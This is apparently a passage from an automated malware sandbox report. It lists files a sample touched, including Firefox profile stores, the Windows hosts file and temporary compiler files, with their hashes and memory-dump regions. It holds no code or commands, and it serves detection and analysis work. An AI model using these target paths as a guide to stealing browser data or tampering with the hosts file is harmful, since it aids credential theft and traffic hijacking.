34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs-1.js

Filesize
10KB

MD5
a24e35987438b7596430881770935b10

SHA1
f97a78ddbde095c4dd572f0ce1bb5bc53e2ab160

SHA256
b9ac01dcf089cb52f3875897650515f95fba06a24a239ddf25c67ecd87a64115

SHA512
ca3b58b3744d2e2591c66306cba4bdced73a52642eaa43fc578e3f28a556dfa67a9f6996a4e404a6323514c4655e9c339eadd73da2d814f9b54e3d40dde594d8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js

Filesize
10KB

MD5
b6a4465aace0e90140d406b6d664fb00

SHA1
3f2fd4684d2529c0d9744eddee6c0178c81ca7f0

SHA256
0f4567a6fb07060feb14111e0d441b16482da78ffab12ef5e03799cbee315bd4

SHA512
dca90e71bb32b10336cb0b34f314f0d8c68ebfc2cf14b86a8401fff9146b50057a393c23aed0139b3efe912fa732e429db418601f0d0fc3132aa21b1e53c684a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js

Filesize
10KB

MD5
438660c756a267abeb32836ad82d2425

SHA1
b32a9e2bb7b7424a6f9855a1fd67ca155fa248f9

SHA256
86e1b77c8bf1a20164b819d69ac616c68ccc724aa86bd87333ed3141e9ad60d8

SHA512
2ffbb86d3413da607fd01eb063e7aced3e2b1e632c098122b385fddff67ad029251c6d690e199be94433255200a3fb1895dc5434d29eead572576fe38407b9a6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
e8b78e02cd26e2f5f1d88c8ced298c6b

SHA1
4cba11481e1f893a1f19381d2b93e81061201c69

SHA256
1892a991cbec4ef3319168358b07370faf7f07416091cd083efc1b5625481a4a

SHA512
3c906a60212ca8ffa3f2198e6a81d5c07457dce6c321dde18f7b1d84d2403faaeae482013454be4e3bb95820bd496748426b93ffc3f735095f33d9f7195fec08

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
b73b6827773406c17a77901506ebd9d6

SHA1
1f9b51225ab959fad000b07d17ec7bc935c5d790

SHA256
fcf565c97f888e0c783ac8660cffc177a8a81fd8deead823d79b5582866a7def

SHA512
5b11753ed4e77e58e2f6d1d247d0214c4b6c88515a86db92e09265c143d055af6477be891b0a731e3fcc664cad496b6d1761fc810463b6890f6ac55682bec7a1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
b9c2de63b5cb1a235a0bd619c81a1bbc

SHA1
88b7b9cc43ca71ef895c8c80c72cce3997147e89

SHA256
b02b9ada8b52d1a17f62eff865c06bdcc9f936a0176ba6410771d0ae5d4eba12

SHA512
0560c53ff4b9fad08bd6d526a5df7f61506682df905d6f312ec0a6c7d777d5b8c8eb2a4148dd1bc3ead2a5b150844efacf6eb564e48fced7a1fc76df4da180fc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
f2f1c65bf45ca7c2d3d6606fdbaf4470

SHA1
a4f00e06a897bd9297726430e82c53c2b8b17886

SHA256
f60af064d697b74b5af730788b4eea6920375f1339e3f7e3a5500d7a8c4447ea

SHA512
6b76a858166adaee7479fa7506ad8b1b3fd8b731f9f8b7429bdf7ae89d01c553ba27115bff1ec90503704ecf465fd2e2b2fc39d37874a66fdc6603e73b13c6d7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
cca68f817a05aba1dc3a61db0d33c433

SHA1
89773cc2f67d52f1a7bd8227efbe1b2715f52138

SHA256
704c4add9f4cb070d579e263661a3398485543d30f4012bd601d5ad8b056cf2d

SHA512
5b390e6d0665c90e6ddc780f64daa907fbd72edfde0c8c8557dfffb4525fd6b07ef5c2297335704391b92550eb3a3ad2ee569e52ab8ce72e87f88c5660347c5c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
404d2c231cbb23eba8a1e3757d70c28c

SHA1
07a7bce124530fd336f19972400263b119dac8c1

SHA256
1e6dbf7c8161bab831097d8750a40016651053a7924ff0c59f97e393478a0535

SHA512
20878260fdea5ae643ec1f0277a16405876e8dbf3753a7230a3a9881fbf42311e5ad5104210f6ac2ea81ab548323f828d14bacbd3e8fbf1fb664b91e58a26053

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
08d8efafc8d12d0d7e35b8d39086cb04

SHA1
20093c8eced44ddd12603de54a0fd523cf0a8de2

SHA256
4e0db44ff17a2201eeedd0c91f17b064515d2db6c358387581be3a70386221ee

SHA512
3064af5aa0be0a3f7eb573c714892d714663029b9c2a9d846fe4982e6206cc3a19d21c721f4643b464b4715e96a91117b8b5a16112e875556b3188b71c61cd3d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
605792d0022f778b5c7f2c951840fccb

SHA1
61de77ccf2ec8dd18af3281f7f3b33e4405795c9

SHA256
de90a7f17cd3425dfc7672c72fa4fdc6e85a35543a62b4f0ea31762916453ff3

SHA512
7b6b3265b7af335407b0819cf3a4bb0bbdde4418390e645c3c4f9e9caffbce1af9ae84cf4a65a6aebc24247016ad3c57cafb52f031608305a07d3bb65e2b43ab

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
384KB

MD5
675d6c9cb92ce9840509c6093a18075c

SHA1
446d1b6b91e62d9716b7338dfa3d04b774f96f6f

SHA256
76e610059b160e05dd81b770c62264830aeee7912c23bdc024253d042a0faa08

SHA512
7ce18a6bd2054b406740130ad330803c6d6de16ce9cd4591e297ed690dd60a1528a1b0f756b87ab4ae780ccc372ca665b174343b916e73251e78a76018b53688

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\storage\private\uuid+++99571e74-2c7b-46f1-8d07-c3017ecb057f\idb\99e63bdd-2f32-4761-8b34-ed615df06b09.sqlite

Filesize
88KB

MD5
5320abe809e3c400dc87b9de8c9887a6

SHA1
f59516207a43cb494ce2f6c5711b90e574bac9b0

SHA256
ab505ec2b84a565cb36a8e80bbc455975e16acb6b2e8a95fd2449d73f7992b4d

SHA512
7f988eac0c1cf06c2e8d421168037dd76b5114b9c66ef1c0ea2e3932107b542c899e28a030a94e6c646662627cbb9913fb1bf8d3aa937e2b289832127ee5b7cf

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\etyhsu2u\CSC22746AA2F5D4D85ACAB824C42761ED1.TMP

Filesize
652B

MD5
ae45f4d99af3b3cf4dbf7d0ddfb2ddfc

SHA1
10d597c289163d5c83cf9133278efeef1ba74e1d

SHA256
4fb2e28b9ef5105112e9ec3b1c971803ba33d7a6049562d7dfc9fe2ec2968382

SHA512
37b6c7c97905dbdae70ece0a73ddf4ec8d413de28450edd2a5f417015c73e4eb9567120befa29d4ba89f5b298973654c059c115dfcb869795f7a9078f61cf888

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\etyhsu2u\etyhsu2u.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\etyhsu2u\etyhsu2u.cmdline

Filesize
607B

MD5
b0d6ea44b4837bceb16744773de2a722

SHA1
5e324d21640b10c029bd1ce0d40c1b25f90f1da3

SHA256
bb9d8811c513d89c131bd832d4e22140989601e2c0045cc7a6d173c80d1318e4

SHA512
e1d4d7171a244a8302c96375f3795bcd8e1df0baa969981a04a8b5fa06a30d3a9612b84d822ed47f50572d7a5f16a853a5874aeb5f91d15506277b9cbce9b5aa

Download Submit
memory/1232-109-0x00007FFBE7C80000-0x00007FFBE8741000-memory.dmp

Filesize
10.8MB

Download
memory/1232-96-0x00007FFBE7C80000-0x00007FFBE8741000-memory.dmp

Filesize
10.8MB

Download
memory/1232-94-0x00007FFBE7C80000-0x00007FFBE8741000-memory.dmp

Filesize
10.8MB

Download
memory/1232-84-0x0000026FAA4D0000-0x0000026FAA4F2000-memory.dmp

Filesize
136KB

Download
memory/1232-83-0x00007FFBE7C83000-0x00007FFBE7C85000-memory.dmp

Filesize
8KB

Download
memory/2452-232-0x000001C1BB220000-0x000001C1BB228000-memory.dmp

Filesize
32KB

Download
memory/2740-72-0x0000020500DA0000-0x0000020501115000-memory.dmp

Filesize
3.5MB

Download
memory/2740-318-0x00007FFBFC9E0000-0x00007FFBFCA04000-memory.dmp

Filesize
144KB

Download
memory/2740-322-0x00007FFBF8370000-0x00007FFBF838F000-memory.dmp

Filesize
124KB

Download
memory/2740-317-0x00007FFBE9680000-0x00007FFBE9AEE000-memory.dmp

Filesize
4.4MB

Download
memory/2740-326-0x00007FFBF4DF0000-0x00007FFBF4E1E000-memory.dmp

Filesize
184KB

Download
memory/2740-323-0x00007FFBE9310000-0x00007FFBE9481000-memory.dmp

Filesize
1.4MB

Download
memory/2740-303-0x00007FFBE9560000-0x00007FFBE9678000-memory.dmp

Filesize
1.1MB

Download
memory/2740-215-0x0000020500DA0000-0x0000020501115000-memory.dmp

Filesize
3.5MB

Download
memory/2740-216-0x00007FFBE8910000-0x00007FFBE8C85000-memory.dmp

Filesize
3.5MB

Download
memory/2740-205-0x00007FFBE8C90000-0x00007FFBE8D48000-memory.dmp

Filesize
736KB

Download
memory/2740-125-0x00007FFBF4DF0000-0x00007FFBF4E1E000-memory.dmp

Filesize
184KB

Download
memory/2740-684-0x00007FFBE9680000-0x00007FFBE9AEE000-memory.dmp

Filesize
4.4MB

Download
memory/2740-725-0x00007FFBF8FA0000-0x00007FFBF8FB4000-memory.dmp

Filesize
80KB

Download
memory/2740-724-0x00007FFBE8C90000-0x00007FFBE8D48000-memory.dmp

Filesize
736KB

Download
memory/2740-723-0x00007FFBF4DF0000-0x00007FFBF4E1E000-memory.dmp

Filesize
184KB

Download
memory/2740-722-0x00007FFBF7FE0000-0x00007FFBF7FF9000-memory.dmp

Filesize
100KB

Download
memory/2740-711-0x00007FFBE8910000-0x00007FFBE8C85000-memory.dmp

Filesize
3.5MB

Download
memory/2740-721-0x00007FFBE9310000-0x00007FFBE9481000-memory.dmp

Filesize
1.4MB

Download
memory/2740-720-0x00007FFBF8370000-0x00007FFBF838F000-memory.dmp

Filesize
124KB

Download
memory/2740-719-0x00007FFBF78F0000-0x00007FFBF791D000-memory.dmp

Filesize
180KB

Download
memory/2740-718-0x00007FFBF83B0000-0x00007FFBF83C9000-memory.dmp

Filesize
100KB

Download
memory/2740-717-0x00007FFBFE9D0000-0x00007FFBFE9DF000-memory.dmp

Filesize
60KB

Download
memory/2740-716-0x00007FFBFC9E0000-0x00007FFBFCA04000-memory.dmp

Filesize
144KB

Download
memory/2740-715-0x00007FFBFCBF0000-0x00007FFBFCBFD000-memory.dmp

Filesize
52KB

Download
memory/2740-714-0x00007FFBE9560000-0x00007FFBE9678000-memory.dmp

Filesize
1.1MB

Download
memory/2740-713-0x00007FFBF8900000-0x00007FFBF890D000-memory.dmp

Filesize
52KB

Download
memory/2740-700-0x00007FFBE9680000-0x00007FFBE9AEE000-memory.dmp

Filesize
4.4MB

Download
memory/2740-97-0x00007FFBF7FE0000-0x00007FFBF7FF9000-memory.dmp

Filesize
100KB

Download
memory/2740-95-0x00007FFBE9310000-0x00007FFBE9481000-memory.dmp

Filesize
1.4MB

Download
memory/2740-82-0x00007FFBF8370000-0x00007FFBF838F000-memory.dmp

Filesize
124KB

Download
memory/2740-81-0x00007FFBE9560000-0x00007FFBE9678000-memory.dmp

Filesize
1.1MB

Download
memory/2740-80-0x00007FFBF83B0000-0x00007FFBF83C9000-memory.dmp

Filesize
100KB

Download
memory/2740-78-0x00007FFBF8900000-0x00007FFBF890D000-memory.dmp

Filesize
52KB

Download
memory/2740-76-0x00007FFBF8FA0000-0x00007FFBF8FB4000-memory.dmp

Filesize
80KB

Download
memory/2740-70-0x00007FFBE9680000-0x00007FFBE9AEE000-memory.dmp

Filesize
4.4MB

Download
memory/2740-71-0x00007FFBE8C90000-0x00007FFBE8D48000-memory.dmp

Filesize
736KB

Download
memory/2740-74-0x00007FFBFC9E0000-0x00007FFBFCA04000-memory.dmp

Filesize
144KB

Download
memory/2740-73-0x00007FFBE8910000-0x00007FFBE8C85000-memory.dmp

Filesize
3.5MB

Download
memory/2740-66-0x00007FFBF4DF0000-0x00007FFBF4E1E000-memory.dmp

Filesize
184KB

Download
memory/2740-64-0x00007FFBFCBF0000-0x00007FFBFCBFD000-memory.dmp

Filesize
52KB

Download
memory/2740-62-0x00007FFBF7FE0000-0x00007FFBF7FF9000-memory.dmp

Filesize
100KB

Download
memory/2740-60-0x00007FFBE9310000-0x00007FFBE9481000-memory.dmp

Filesize
1.4MB

Download
memory/2740-58-0x00007FFBF8370000-0x00007FFBF838F000-memory.dmp

Filesize
124KB

Download
memory/2740-55-0x00007FFBF78F0000-0x00007FFBF791D000-memory.dmp

Filesize
180KB

Download
memory/2740-56-0x00007FFBF83B0000-0x00007FFBF83C9000-memory.dmp

Filesize
100KB

Download
memory/2740-30-0x00007FFBFC9E0000-0x00007FFBFCA04000-memory.dmp

Filesize
144KB

Download
memory/2740-48-0x00007FFBFE9D0000-0x00007FFBFE9DF000-memory.dmp

Filesize
60KB

Download
memory/2740-25-0x00007FFBE9680000-0x00007FFBE9AEE000-memory.dmp

Filesize
4.4MB

Download